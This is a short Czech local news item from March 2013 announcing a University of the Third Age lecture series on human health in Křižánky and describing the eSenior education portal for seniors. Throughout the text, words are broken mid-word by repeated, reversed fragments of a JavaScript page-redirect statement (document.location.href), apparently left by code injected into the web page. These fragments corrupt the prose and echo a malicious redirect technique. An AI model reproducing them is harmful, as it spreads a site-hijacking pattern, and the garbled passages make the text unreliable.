Křižánky, krizanky, aktuality, univerzita
Rainbow page separator

V Křižánkách zahajuje Univerzita třetího věku

Pondělí, 4. března 2013

Křižánky / Další série přednášek České zemědělské univerzity v Praze se v rámci Univerzity třetího věku uskuteční v Křižánkách na Novoměstsku. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát se jedná o přednášky na téma lidské zdraví, první z nich se koná ve středu 6. března od 13.30 hodin ve Vzdělávacím centru Křižánky. Služba je za minimální poplatek, stálí i noví studenti se mohou hlásit přímo v centru.

Univerzita třetího věku se v Křižánkách koná pod zášti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Provozně ekonomické fakulty České zemědělské univerzity v Praze a vychází z myšlenky, že jedním ze způsobů činorodého přístupu ke stáří je vzdělávání. To se pro seniory stává prostředkem pro hledání cesty, způsobu života a jeho hodnot, pro poznávání životních možností, ale i nutností.

S Univerzi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou třetího věku v Křižánkách, jedním z celkem pěti konzultačních středisek v Kraji Vysočina, souvisí i interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový portál eSenior. Ten je určen především pro vzdělávání seniorů v regionech, kteří se z různých důvodů nemohou zúčastňovat výuky Univerzity třetího věku prezenční formou v sídlech vysokých škol a univerzit.